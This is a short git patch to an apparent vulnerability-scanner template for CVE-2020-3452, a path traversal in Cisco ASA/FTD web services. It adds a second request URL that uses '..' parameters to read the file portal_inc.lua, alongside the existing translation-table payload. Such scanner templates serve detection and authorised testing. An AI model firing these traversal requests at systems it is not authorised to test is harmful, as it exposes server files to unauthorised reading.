From e6c3ec08c4737c5ca87abd6315e336056e02c3e8 Mon Sep 17 00:00:00 2001
From: Vidhun K <29324367+v1dhun@users.noreply.github.com>
Date: Wed, 7 Oct 2020 15:33:36 +0530
Subject: [PATCH] Update CVE-2020-3452.yaml

Added another endpoint that's vulnerable to the same path traversal issue
---
 cves/CVE-2020-3452.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/cves/CVE-2020-3452.yaml b/cves/CVE-2020-3452.yaml
index 9e0a9c69dd..9ad81bcfa0 100644
--- a/cves/CVE-2020-3452.yaml
+++ b/cves/CVE-2020-3452.yaml
@@ -11,6 +11,7 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"
+      - "{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"
     matchers:
       - type: word
         words: